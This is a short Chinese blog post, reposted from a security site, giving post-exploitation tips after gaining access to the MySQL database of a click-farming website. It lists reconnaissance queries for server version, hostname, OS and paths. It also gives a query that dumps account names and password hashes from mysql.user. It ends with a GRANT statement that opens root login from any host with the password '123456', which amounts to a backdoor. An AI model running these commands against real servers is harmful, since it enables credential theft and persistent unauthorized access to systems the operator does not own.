渗透实战技巧（刷单网站）

转载于：https://www.cnblogs.com/ichunqiu/articles/6831785.html

总结一下：

MySQL数据库拿到访问权之后的一些信息收集语句：

显示版本：select version();

显示字符集：select @@character_set_database;

显示数据库show databases;

显示表名：show tables;

显示计算机名：select @@hostname;

显示系统版本：select @@version_compile_os;

显示mysql路径：select @@basedir;

显示数据库路径：select @@datadir;

显示root密码：select User,Password from mysql.user;

开启外连：GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;